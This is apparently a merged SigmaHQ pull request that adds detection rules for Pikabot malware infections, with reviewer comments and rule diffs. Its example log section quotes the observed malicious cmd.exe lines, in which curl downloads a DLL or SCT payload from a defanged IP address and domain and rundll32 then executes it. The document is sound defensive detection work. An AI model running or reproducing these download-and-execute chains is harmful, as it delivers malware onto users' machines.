### PR TITLE
Process Creation Cmdline Matches Patterns Observed in Pikabot Infections (with variations)

### PR DESCRIPTION
**Pull request by ahouspan**
### Summary of the Pull Request
This PR delivers detections against Pikabot infections.
Rules are derived from publicly available information: https://github.com/pr0xylife/Pikabot

### Changelog
--Updated after peer review:
new:	Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
updated:	Cscript/Wscript Potentially Suspicious Child Process --- WScript.exe Spawns RunDll32.exe
### Example Log Event

`wscript.exe C:\Users\Admin\AppData\Local\Temp\Notesjl.js`
|_ `rundll32 C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll,Enter`

`cmd.exe /c LC || echO LC & pInG LC || cUrl hxxp://188.34.192.184/76DKN6/plast -o %TmP%\LC.sct & pInG -n 3 LC || RUNDLL32 %TmP%\LC.sct, Crash & eXit KCqBSVojsBqrwoS`

`cmd.exe /c mkdir  C:\Gofkvlgdigt\Ekfgihcifmv & curl hxxps://adanacigkoftesiparis.com/ViUbB/0.4794982785991857.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll`

`cmd.exe /c timeout 10 & rundll32 C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll,Enter`

### Fixed Issues
N/A

### SigmaHQ Rule Creation Conventions

- If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/sigmahq_conventions.md)

### CODE REVIEW

**Comment by nasbench** [comment]
@ahouspan please unprotect your branch in order for me to push updates.

**Comment by ahouspan** [comment]
Well... it seems there is no branch protection rule...
image
Something else I should check or do?
Thanks!

**Comment by nasbench** [comment]
Its an issue with permission on your branch. I can't push to your remote. Please double check :)
If its not protected branch it may be something else.
image
image

**Comment by nasbench** [comment]
Thanks for fixing the issue.

I made some changes to the rules you submitted here is a small explanation of what i did. Feel free to discuss this if you think there's a better way or you have a different opinion.

- I dropped the `Suspicious Process Genealogy - WScript.exe Spawns RunDll32.exe` and merged the logic with an already existing rule that's looking for child process of wscript. As i feel that's generic enough to be not only be linked to pikabot
- for the rule `Process Creation Cmdline Matches Patterns Observed in Pikabot Infections` that was using regex its pratically the same as `Process Creation Cmdline Matches Patterns Observed in Pikabot Infections (Variation)` just the regex gives a strict order (reduced FP). But I think we could achieve the same effect with the other rules. So that's what I did.

I restructured the selection to be more accurate to the observed CLIs.

Let me know what you think and thanks for the contribution :)

**Review by nasbench — APPROVED** [review]

**Comment by ahouspan** [comment]
Looks good. Thanks!

File: rules-emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml [hunk 1]
```diff
@@ -0,0 +1,44 @@
+title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
+id: e5144106-8198-4f6e-bfc2-0a551cc8dd94
+status: experimental
+description: |
+    Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads.
+    Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious dll files.
+    In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the downlaod and execution of malicious DLL files.
```
Comment (phantinuss) [inline rules-emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml:7]:
```suggestion
    Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads.
    Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files.
    In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
```

File: rules/windows/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml [hunk 2]
```diff
@@ -1,9 +1,16 @@
-title: Cscript/Wscript Suspicious Child Process
+title: Cscript/Wscript Potentially Suspicious Child Process
 id: b6676963-0353-4f88-90f5-36c20d443c6a
 status: experimental
-description: Detects suspicious child processes of Wscript/Cscript
-author: Nasreddine Bencherchali (Nextron Systems)
+description: |
+    Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or powershell spawning rundll32 or regsvr32.
+    Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.
+references:
```
Comment (phantinuss) [inline rules/windows/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml:7]:
```suggestion
    Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32.
    Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.
references:
```

**Review by phantinuss — APPROVED** [review]

**Pull request merged**